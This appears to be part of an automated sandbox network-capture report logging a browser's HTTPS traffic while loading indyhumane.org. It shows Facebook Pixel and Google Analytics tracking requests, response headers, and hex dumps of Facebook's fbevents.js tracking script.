                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7457729497261661588", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7457729497261661588"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC1834INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27 77 61 73 6d 2d 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 67 6f
                                                                                                                                                                                                                                                        Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'wasm-unsafe-eval' https://*.go
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC1752INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC4INData Raw: 34 33 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 43
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC74INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 04 00 00 00 b5 1c 0c 02 00 00 00 0a 49 44 41 54 78 9c 63 00 01 00 00 05 00 01 0d 0a 2d b4 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRIDATxc-IENDB`0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        136192.168.2.449919157.240.251.354432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC616OUTGET /tr/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387957087&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC464INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                        Server: proxygen-bolt
                                                                                                                                                                                                                                                        X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=10, mss=1392, tbw=3403, tp=-1, tpl=-1, uplat=0, ullat=0
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:19 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        137192.168.2.449921157.240.252.134432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC1392OUTGET /signals/config/1401480206566122?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C203%2C202%2C204%2C209%2C210%2C211%2C207%2C199%2C133%2C164%2C198%2C200%2C123%2C158%2C146%2C152%2C130%2C236%2C117%2C128%2C237%2C166%2C120%2C239%2C167%2C137%2C124% [TRUNCATED]
                                                                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                        content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-mlKhUtmI' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                        document-policy: force-load-at-top
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC907INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69
                                                                                                                                                                                                                                                        Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wi
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC15477INData Raw: 48 45 52 0a 2a 20 49 4e 20 41 4e 20 41 43 54 49 4f 4e 20 4f 46 20 43 4f 4e 54 52 41 43 54 2c 20 54 4f 52 54 20 4f 52 20 4f 54 48 45 52 57 49 53 45 2c 20 41 52 49 53 49 4e 47 20 46 52 4f 4d 2c 20 4f 55 54 20 4f 46 20 4f 52 20 49 4e 0a 2a 20 43 4f 4e 4e 45 43 54 49 4f 4e 20 57 49 54 48 20 54 48 45 20 53 4f 46 54 57 41 52 45 20 4f 52 20 54 48 45 20 55 53 45 20 4f 52 20 4f 54 48 45 52 20 44 45 41 4c 49 4e 47 53 20 49 4e 20 54 48 45 20 53 4f 46 54 57 41 52 45 2e 0a 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 66 3d 61 2e 66 62 71 3b 66 2e 65 78 65 63 53 74 61 72 74 3d 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65
                                                                                                                                                                                                                                                        Data Ascii: HER* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.*/(function(a,b,c,d){var e={exports:{}};e.exports;(function(){var f=a.fbq;f.execStart=a.performance
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC1500INData Raw: 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 62 5d 3d 61 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 63 6c 69 65 6e 74 68 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 29 7d 29 28 29 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 6c 6f 63 61 74 69 6f 6e 2c 68 69 73 74 6f 72 79 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 66 3d 61 2e 66 62 71 3b 66 2e 65 78 65 63 53 74 61 72 74 3d 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65
                                                                                                                                                                                                                                                        Data Ascii: |(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("fbevents.plugins.clienthint",function(){return e.exports})})()})(window,document,location,history);(function(a,b,c,d){var e={exports:{}};e.exports;(function(){var f=a.fbq;f.execStart=a.performance
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC1763INData Raw: 6c 20 45 72 72 6f 72 3a 20 50 69 78 65 6c 20 63 6f 64 65 20 69 73 20 6e 6f 74 20 69 6e 73 74 61 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 20 6f 6e 20 74 68 69 73 20 70 61 67 65 22 29 3b 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 28 29 29 72 65 74 75 72 6e 3b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64
                                                                                                                                                                                                                                                        Data Ascii: l Error: Pixel code is not installed correctly on this page");return!1}return!0}())return;f.__fbeventsModules||(f.__fbeventsModules={},f.__fbeventsResolvedModules={},f.getFbeventsModules=function(a){f.__fbeventsResolvedModules[a]||(f.__fbeventsResolvedMod
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC4064INData Raw: 65 73 73 61 67 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 69 66 28 21 66 29 7b 62 28 7b 61 63 74 69 6f 6e 3a 22 46 42 5f 4c 4f 47 22 2c 6c 6f 67 54 79 70 65 3a 22 46 61 63 65 62 6f 6f 6b 20 50 69 78 65 6c 20 45 72 72 6f 72 22 2c 6c 6f 67 4d 65 73 73 61 67 65 3a 22 50 69 78 65 6c 20 63 6f 64 65 20 69 73 20 6e 6f 74 20 69 6e 73 74 61 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 20 6f 6e 20 74 68 69 73 20 70 61 67 65 22 7d 2c 22 2a 22 29 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 46 61 63 65 62 6f 6f 6b 20 50 69 78 65 6c 20 45 72 72 6f 72 3a 20 50 69 78 65 6c 20 63 6f 64 65 20 69 73 20 6e 6f 74 20 69 6e 73 74 61 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 20 6f 6e 20 74 68 69 73 20 70 61 67 65 22
                                                                                                                                                                                                                                                        Data Ascii: essage||function(){};if(!f){b({action:"FB_LOG",logType:"Facebook Pixel Error",logMessage:"Pixel code is not installed correctly on this page"},"*");"error"in console&&console.error("Facebook Pixel Error: Pixel code is not installed correctly on this page"
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC3216INData Raw: 22 3a 35 30 30 7d 29 3b 0a 63 6f 6e 66 69 67 2e 73 65 74 28 22 31 34 30 31 34 38 30 32 30 36 35 36 36 31 32 32 22 2c 20 22 70 72 6f 68 69 62 69 74 65 64 53 6f 75 72 63 65 73 22 2c 20 7b 22 70 72 6f 68 69 62 69 74 65 64 53 6f 75 72 63 65 73 22 3a 5b 7b 22 64 6f 6d 61 69 6e 22 3a 22 62 39 65 30 32 32 32 65 36 32 30 61 37 30 61 39 66 31 62 35 36 39 64 31 30 36 63 39 37 64 39 62 30 61 39 30 36 31 65 37 66 64 65 61 65 31 66 35 39 33 34 66 32 33 35 65 37 36 64 64 62 36 33 39 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 63 33 37 32 36 39 61 62 65 66 35 36 64 39 63 34 65 38 66 33 34 30 64 66 65 63 65 62 35 37 64 66 30 32 32 31 31 33 33 64 36 38 33 66 36 36 39 31 63 30 31 62 64 37 61 62 36 64 65 62 64 62 34 64 22 7d 5d 7d 29 3b 0a 66 62 71 2e 6c 6f 61 64 50 6c 75 67
                                                                                                                                                                                                                                                        Data Ascii: ":500});config.set("1401480206566122", "prohibitedSources", {"prohibitedSources":[{"domain":"b9e0222e620a70a9f1b569d106c97d9b0a9061e7fdeae1f5934f235e76ddb639"},{"domain":"c37269abef56d9c4e8f340dfeceb57df0221133d683f6691c01bd7ab6debdb4d"}]});fbq.loadPlug
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC3084INData Raw: 38 35 33 39 35 65 63 30 34 63 63 32 62 22 2c 22 65 62 34 32 64 35 32 65 34 37 31 38 63 31 35 63 36 65 34 32 36 37 31 33 61 32 32 61 64 35 63 62 39 30 36 35 64 39 31 35 38 62 30 62 38 64 66 38 39 37 37 36 39 61 31 65 31 34 61 63 38 33 61 66 22 2c 22 33 66 66 36 63 30 35 37 32 33 62 62 30 36 39 64 31 39 39 35 33 33 34 30 33 32 30 66 61 39 35 31 32 66 30 62 65 35 38 34 37 34 32 37 30 33 65 36 30 32 32 36 64 65 64 32 38 62 62 34 33 38 36 31 22 2c 22 66 62 61 65 30 34 31 62 30 32 63 34 31 65 64 30 66 64 38 61 34 65 66 62 30 33 39 62 63 37 38 30 64 64 36 61 66 34 61 31 66 30 63 34 32 30 66 34 32 35 36 31 61 65 37 30 35 64 64 61 34 33 66 65 22 2c 22 38 65 33 35 63 32 63 64 33 62 66 36 36 34 31 62 64 62 30 65 32 30 35 30 62 37 36 39 33 32 63 62 62 32 65 36 30 33
                                                                                                                                                                                                                                                        Data Ascii: 85395ec04cc2b","eb42d52e4718c15c6e426713a22ad5cb9065d9158b0b8df897769a1e14ac83af","3ff6c05723bb069d19953340320fa9512f0be584742703e60226ded28bb43861","fbae041b02c41ed0fd8a4efb039bc780dd6af4a1f0c420f42561ae705dda43fe","8e35c2cd3bf6641bdb0e2050b76932cbb2e603


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        138192.168.2.449918157.240.251.354432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC653OUTGET /privacy_sandbox/pixel/register/trigger/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387957087&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7457729497756245190", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7457729497756245190"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC1834INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27 77 61 73 6d 2d 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 67 6f
                                                                                                                                                                                                                                                        Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'wasm-unsafe-eval' https://*.go
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC1705INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        139192.168.2.449923173.194.76.1544432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC892OUTPOST /g/collect?v=2&tid=G-RSYQJ6KTLL&cid=932040568.1736387953&gtm=45je5170v9134491864za200&aip=1&dma=0&gcd=13l3l3l3l2l1&npa=0&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178 HTTP/1.1
                                                                                                                                                                                                                                                        Host: stats.g.doubleclick.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
